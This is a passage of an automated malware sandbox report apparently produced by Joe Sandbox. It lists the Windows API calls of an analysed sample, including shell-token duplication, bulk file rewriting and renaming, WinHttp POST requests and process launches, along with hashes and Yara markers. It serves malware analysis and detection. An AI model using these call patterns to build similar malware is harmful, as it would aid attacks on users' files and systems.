        • Part of subcall function 00CA86B7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 00CA86EA
        • Part of subcall function 00CA86B7: SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 00CA8713
        • Part of subcall function 00CA86B7: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CA8737
        • Part of subcall function 00CA86B7: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CA8766
      • CloseHandle.KERNEL32(?), ref: 00CA8AC2
      • CloseHandle.KERNEL32(000000FF), ref: 00CA8ACD
      • DeleteFileW.KERNEL32(?), ref: 00CA8AE3
      Similarity
      • API ID: File$PointerWrite$AttributesBuffersCloseCreateFlushHandle$DeleteRead
      • String ID:
      • API String ID: 668398616-0
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • GetVersion.KERNEL32(00000000,?,00000000), ref: 00CA4A12
      • GetModuleHandleA.KERNEL32(?,00000001), ref: 00CA4A71
      • GetProcAddress.KERNEL32(00000000), ref: 00CA4A78
      • CloseHandle.KERNEL32(?), ref: 00CA4B38
        • Part of subcall function 00CA5B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00CA5B3B,00000000,00000000,00000000,00CA37EB,00000000), ref: 00CA5B19
      • GetShellWindow.USER32 ref: 00CA4AA3
      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00CA4AB2
      • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00CA4AC5
      • OpenProcessToken.ADVAPI32(00000000,02000000,00CA2B94), ref: 00CA4ADD
      • DuplicateTokenEx.ADVAPI32(00CA2B94,02000000,?,00000002,00000001,?), ref: 00CA4AFE
      • CloseHandle.KERNEL32(?), ref: 00CA4B42
      • CloseHandle.KERNEL32(?), ref: 00CA4B4C
      • CloseHandle.KERNEL32(00CA2B94), ref: 00CA4B56
      • CloseHandle.KERNEL32(?), ref: 00CA4B60
        • Part of subcall function 00CA3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,00CA48E0,?), ref: 00CA3D8C
        • Part of subcall function 00CA3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00CA3DA1
      Similarity
      • API ID: Handle$Close$Process$Module$AddressHeapOpenProcTokenWindow$AllocateDuplicateFileNameShellThreadVersion
      • String ID:
      • API String ID: 2214859210-0
      APIs
        • Part of subcall function 00CA3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00CA28D8,00000000,00000000), ref: 00CA3CA2
        • Part of subcall function 00CA3A18: RegOpenKeyExW.KERNELBASE(00000002,00000000,00000000,00020119,00000000,00000000,00000000,80000002,00000000,00000002,?), ref: 00CA3A44
        • Part of subcall function 00CA3A18: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,?), ref: 00CA3A60
        • Part of subcall function 00CA3A18: RegCloseKey.KERNELBASE(?), ref: 00CA3A79
      • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,80000002,00000000,00000002,?), ref: 00CA463C
      • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,80000002,00000000,00000002,?), ref: 00CA464E
      • GetProcAddress.KERNEL32(00000000), ref: 00CA4655
      • GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 00CA46E1
      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,?,00000000), ref: 00CA4737
      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 00CA475F
      • WriteFile.KERNEL32(?,?,00000208,?,00000000,?,?,?,?,00000000), ref: 00CA478B
      • FlushFileBuffers.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 00CA47A3
      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 00CA47AD
        • Part of subcall function 00CA3EE1: GetModuleHandleA.KERNEL32(00000000,00000001,74DF35B0,00000208,00000000), ref: 00CA3F86
        • Part of subcall function 00CA3EE1: GetProcAddress.KERNEL32(00000000), ref: 00CA3F8F
        • Part of subcall function 00CA3EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA3F98
        • Part of subcall function 00CA3EE1: GetProcAddress.KERNEL32(00000000), ref: 00CA3F9B
        • Part of subcall function 00CA3EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA3FA4
        • Part of subcall function 00CA3EE1: GetProcAddress.KERNEL32(00000000), ref: 00CA3FA7
        • Part of subcall function 00CA3EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA3FB0
        • Part of subcall function 00CA3EE1: GetProcAddress.KERNEL32(00000000), ref: 00CA3FB3
        • Part of subcall function 00CA3EE1: GetCurrentProcessId.KERNEL32 ref: 00CA3FE6
        • Part of subcall function 00CA3EE1: OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 00CA3FF3
        • Part of subcall function 00CA4325: CoInitializeEx.OLE32(00000000,00000006,?,74DF35B0,00000208,00000000,00CA47D7,?,00000000,?), ref: 00CA437F
        • Part of subcall function 00CA4325: CoUninitialize.OLE32(?,?,?,?,?,?,74DF35B0,00000208,00000000,00CA47D7), ref: 00CA43B5
        • Part of subcall function 00CA3E9E: ShellExecuteExW.SHELL32(?), ref: 00CA3ED9
      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,00000000), ref: 00CA47FA
      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CA4824
      Similarity
      • API ID: Handle$AddressFileModuleProc$Process$CloseCurrentOpenWrite$BuffersCreateDeleteExecuteFlushInformationInitializeObjectQueryShellSingleUninitializeValueVersionVolumeWait
      • String ID:
      • API String ID: 3832649910-0
      APIs
      • WinHttpOpen.WINHTTP(00CAA3C0,00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00CA3CD3
      • WinHttpConnect.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00CA3CE7
      • WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 00CA3D08
      • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,00000000,00000000), ref: 00CA3D21
      • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00CA3D2D
      • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,00000000,00000000,00000000), ref: 00CA3D37
      • WinHttpCloseHandle.WINHTTP(?,?,?,?,00000000,00000000,00000000), ref: 00CA3D3C
      • WinHttpCloseHandle.WINHTTP(?,?,?,?,00000000,00000000,00000000), ref: 00CA3D42
      Similarity
      • API ID: Http$CloseHandle$OpenRequest$ConnectReceiveResponseSend
      • String ID: POST
      • API String ID: 4150888541-1814004025
      APIs
      • MoveFileW.KERNEL32(?,?), ref: 00CA8CD3
      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00CA8CF1
      • SetFilePointerEx.KERNEL32(00000001,?,?,?,00000002), ref: 00CA8E3F
      • WriteFile.KERNEL32(00000001,?,?,?,00000000), ref: 00CA8E59
      • SetEndOfFile.KERNEL32(00000001), ref: 00CA8E6F
        • Part of subcall function 00CA8AF1: SetFilePointerEx.KERNEL32(?,00000000,?,?,00000000), ref: 00CA8B28
        • Part of subcall function 00CA8AF1: WriteFile.KERNEL32(?,?,00040000,?,00000000), ref: 00CA8B3F
      • FlushFileBuffers.KERNEL32(00000001), ref: 00CA8E8E
      • CloseHandle.KERNEL32(?), ref: 00CA8E9E
      • MoveFileW.KERNEL32(?,?), ref: 00CA8EB0
      Similarity
      • API ID: File$MovePointerWrite$BuffersCloseCreateFlushHandle
      • String ID:
      • API String ID: 4283038262-0
      • Opcode ID: cbe5700ade3f563ff58c8cb4c60f09231d22871caa411c952147dcd31db094a6
      • Instruction ID: 79b20fd4879eec7a03200be3c80fa11b4ba3c456c6c28df32f64a0192adfbca4
      • Opcode Fuzzy Hash: cbe5700ade3f563ff58c8cb4c60f09231d22871caa411c952147dcd31db094a6
      • Instruction Fuzzy Hash: C771AF71A0020AEFDF119FA4CC45FEEBBB9BF09308F044429F915E6251DB759A18DB61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CA8ED8
      • GetFileSizeEx.KERNEL32(00000000,?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CA8EEE
      • CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CA8EFD
      • GetFileAttributesW.KERNEL32(?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CA8F1B
      • SetFileAttributesW.KERNEL32(?,00000000,?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CA8F3C
        • Part of subcall function 00CA8782: GetFileAttributesW.KERNEL32(?), ref: 00CA87F3
        • Part of subcall function 00CA8782: GetFileAttributesW.KERNEL32(?), ref: 00CA8816
        • Part of subcall function 00CA8782: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00CA8835
        • Part of subcall function 00CA8782: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 00CA885C
        • Part of subcall function 00CA8782: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00CA888C
      • SetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 00CA8F8F
      • SetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 00CA8F94
      • CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CA8F9C
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$Attributes$CloseCreateHandlePointer$Size
      • String ID:
      • API String ID: 3440144462-0
      • Opcode ID: dc6981b437840034f2bd78cbfb24a733337fd19729b8075e7525d7e8f92fb24a
      • Instruction ID: b6e3b773c2668219219337b6f4441eb473498b06049854e56af0def473862f50
      • Opcode Fuzzy Hash: dc6981b437840034f2bd78cbfb24a733337fd19729b8075e7525d7e8f92fb24a
      • Instruction Fuzzy Hash: EE312F7090020BAFDF119FE5DC44BBEBBB9EF06328F144115F925A2290DB348A58DB61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00CA2C15), ref: 00CA2444
      • CreateThread.KERNEL32(00000000,00000000,00CA454B,00000000,00000000,00000000), ref: 00CA245A
        • Part of subcall function 00CA4F7A: ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,00CA2C6F,00000001), ref: 00CA4F95
        • Part of subcall function 00CA4F7A: CloseHandle.KERNEL32(?,?,00CA2C6F,00000001), ref: 00CA4F9E
      • Sleep.KERNEL32(00000064), ref: 00CA2472
      • SetEvent.KERNEL32(00000000), ref: 00CA2486
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CA2495
      • GetExitCodeThread.KERNEL32(?,?), ref: 00CA24A4
      • CloseHandle.KERNEL32(00000000), ref: 00CA24B1
      • CloseHandle.KERNEL32(?), ref: 00CA24B8
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CreateEventThread$CodeExitMutexObjectReleaseSingleSleepWait
      • String ID:
      • API String ID: 2313513115-0
      • Opcode ID: 2ad54f9ab6cc2047a0c0ee0218830a933beb2aa2d005ea1e9b748a8821f7f816
      • Instruction ID: f89130d804ddf0ad252a96222ad89b2b5c353f52ef0fa86ebaece85a81485fbc
      • Opcode Fuzzy Hash: 2ad54f9ab6cc2047a0c0ee0218830a933beb2aa2d005ea1e9b748a8821f7f816
      • Instruction Fuzzy Hash: 53118835A00629BBD7216BAA9C8CFAF7F7DEBCBB59F104116F512A3150D7744A00CA71
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • LeaveCriticalSection.KERNEL32(00CA1FEB,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA5387
      • WaitForSingleObject.KERNEL32(A0A815FF,000000FF,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA5392
      • EnterCriticalSection.KERNEL32(00CA1FEB,00CA1FDB,00000000,00000000,00CA58E8,00000000,0000010C,00000000,00000000,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA539D
      • ResetEvent.KERNEL32(468B00CA,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA53B3
      • ResetEvent.KERNEL32(CAA0A815,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA53CA
      • LeaveCriticalSection.KERNEL32(00CA1FEB,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA53D9
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$EventLeaveReset$EnterObjectSingleWait
      • String ID:
      • API String ID: 622437971-0
      • Opcode ID: 142ee27ef5876cee489706892b845a280271a7eb4ed216d6b3a8e253561e7999
      • Instruction ID: 669f57f20ce4d125e31bda764002299ac37086d260129463574f720e46c0d65e
      • Opcode Fuzzy Hash: 142ee27ef5876cee489706892b845a280271a7eb4ed216d6b3a8e253561e7999
      • Instruction Fuzzy Hash: B3018871102A12DBDB205F29DC40E1AB7F9EF527E93218A19E4A7D3170D3B0EC01CB50
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • EnterCriticalSection.KERNEL32(0000000C,?,00CA339F), ref: 00CA32AB
      • DeleteCriticalSection.KERNEL32(0000000C,?,00CA339F), ref: 00CA32B2
      • CloseHandle.KERNEL32(00000000,?,00CA339F), ref: 00CA32C5
      • CloseHandle.KERNEL32(?,?,00CA339F), ref: 00CA32CF
      • CloseHandle.KERNEL32(?,?,00CA339F), ref: 00CA32D9
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CriticalSection$DeleteEnter
      • String ID:
      • API String ID: 622934417-0
      • Opcode ID: a56d9f852343960af949c4f17ddd97db9ef94e45e7f1b965f773238b2d5d0fa6
      • Instruction ID: 448735c586b2cda25ee9567256eb33f0acce10d7d805f6a07dbfc861dbe1b1c6
      • Opcode Fuzzy Hash: a56d9f852343960af949c4f17ddd97db9ef94e45e7f1b965f773238b2d5d0fa6
      • Instruction Fuzzy Hash: A4F0B4313002025B96616B29DC85F2BB3FC9EE6B54315050EF415D3541DB35FA41DA61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • EnterCriticalSection.KERNEL32(0000000C,?,00000000,00CA57AF), ref: 00CA33CB
      • SetEvent.KERNEL32(?), ref: 00CA33DE
      • SetEvent.KERNEL32(00000000), ref: 00CA33E2
      • SetEvent.KERNEL32(?), ref: 00CA33E7
      • LeaveCriticalSection.KERNEL32(0000000C), ref: 00CA33EA
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Event$CriticalSection$EnterLeave
      • String ID:
      • API String ID: 259983309-0
      • Opcode ID: fb98a910d8a9f1b6b3ce4ba06fde650bb060d8e731a74b22882c5c08bf7ab130
      • Instruction ID: 7569eb10979e3de8020eb0d2b90bb56df76293b091f3d24998574660b40c31ef
      • Opcode Fuzzy Hash: fb98a910d8a9f1b6b3ce4ba06fde650bb060d8e731a74b22882c5c08bf7ab130
      • Instruction Fuzzy Hash: 92D06776100644EFD6216B66ED88E4B7FAAEFC93653128818E19742431C732A859DF22
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00CA4147
      • GetProcAddress.KERNEL32(00000000), ref: 00CA414E
      • CoGetObject.OLE32(?,?,00CAA1F0,?), ref: 00CA41A1
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: AddressHandleModuleObjectProc
      • String ID: $
      • API String ID: 4150452153-3993045852
      • Opcode ID: 1aee0476a6520c024e5c6cdf1098b1a4b7f654d3e217223403f3603e6f7aae82
      • Instruction ID: abf33b28e2f0488645b11481caad7d7640f5c8a00a315c47f2b8b8e421348c15
      • Opcode Fuzzy Hash: 1aee0476a6520c024e5c6cdf1098b1a4b7f654d3e217223403f3603e6f7aae82
      • Instruction Fuzzy Hash: 6B415A71A0021AEFDF14CFE0D849AAEBBB9FF8A708F104059F511E7250D7719A45CB50
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
        • Part of subcall function 00CA3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,00CA48E0,?), ref: 00CA3D8C
        • Part of subcall function 00CA3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00CA3DA1
        • Part of subcall function 00CA5B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00CA5B3B,00000000,00000000,00000000,00CA37EB,00000000), ref: 00CA5B19
      • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000000), ref: 00CA4908
      • CloseHandle.KERNEL32(?), ref: 00CA491E
      • CloseHandle.KERNEL32(?), ref: 00CA4923
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$CloseHeapModuleProcess$AddressAllocateCreateFileNameProc
      • String ID: D
      • API String ID: 2446471772-2746444292
      • Opcode ID: 6461c406d9926ca55572b95e7574bb45a1fd1884ba76906bb777629eacea2e9d
      • Instruction ID: c83ceb07f284524596849bb3c10e5cd53a77f963fa60217c0d2db04e30127e02
      • Opcode Fuzzy Hash: 6461c406d9926ca55572b95e7574bb45a1fd1884ba76906bb777629eacea2e9d
      • Instruction Fuzzy Hash: 9D11947290021DBFDB14ABF4DC869DFBF7CEB4AB64F100016F205A6141DB709A45D6A1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00CA32FF: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0,?,?,00CA56C4), ref: 00CA331E
        • Part of subcall function 00CA32FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CA3371
        • Part of subcall function 00CA32FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CA337B
        • Part of subcall function 00CA32FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CA3386
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
        • Part of subcall function 00CA3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,00CA48E0,?), ref: 00CA3D8C
        • Part of subcall function 00CA3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00CA3DA1
      • CreateThread.KERNEL32(00000000,00000001,00CA54BF,?,00000000,00000000), ref: 00CA5746
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CA57A4
      • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 00CA57B9
      • CloseHandle.KERNEL32(?), ref: 00CA57CB
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Create$Event$HandleHeapWait$AddressAllocateCloseCountCriticalInitializeModuleMultipleObjectObjectsProcProcessSectionSingleSpinThread
      • String ID:
      • API String ID: 3126403127-0
      • Opcode ID: 5424a2610aed0b78ccb10045a7a4d8b542d3d714492086a95c263f7f9a2db25f
      • Instruction ID: a8347389d6e7ef878babb2db799b01583bf37b35a57b5bacd74d60b10f1c7ea5
      • Opcode Fuzzy Hash: 5424a2610aed0b78ccb10045a7a4d8b542d3d714492086a95c263f7f9a2db25f
      • Instruction Fuzzy Hash: 11412471604B03AFD710AF20CCC2F2AB3A8EF46718F104A29F921961D2EB71DD949B91
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 00CA8B7C
      • __aulldiv.LIBCMT ref: 00CA8BAB
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000000,?,?,00000003,00000000), ref: 00CA8BE9
      • ReadFile.KERNEL32(?,?,00040000,?,00000000), ref: 00CA8C0E
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$Pointer$Read__aulldiv
      • String ID:
      • API String ID: 3696392486-0
      • Opcode ID: c9e1b9e51a0311fe81fb2e5fc04eb358124223f28906fbfa4c82d6702e4ddd4e
      • Instruction ID: da237428f1e77f7db83e58cb86ebff6df14fc2f014dc00ada5e2c3b68442029b
      • Opcode Fuzzy Hash: c9e1b9e51a0311fe81fb2e5fc04eb358124223f28906fbfa4c82d6702e4ddd4e
      • Instruction Fuzzy Hash: 13314FB1D0122AAFCF21CFA5DC44AAFBBB8FB05768F114026F955B3250D7708A41CBA5
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,?), ref: 00CA37A7
      • AllocConsole.KERNEL32 ref: 00CA37C0
      • GetStdHandle.KERNEL32(000000F5), ref: 00CA37C8
      • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00CA381C
        • Part of subcall function 00CA90A1: GetProcessHeap.KERNEL32(00000000,00CA633F,00CA62A2,00000000,00000010,00000000,00000020,00CA633F,00000040,00CA2A6F,00CAB410), ref: 00CA90A7
        • Part of subcall function 00CA90A1: RtlFreeHeap.NTDLL(00000000), ref: 00CA90AE
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
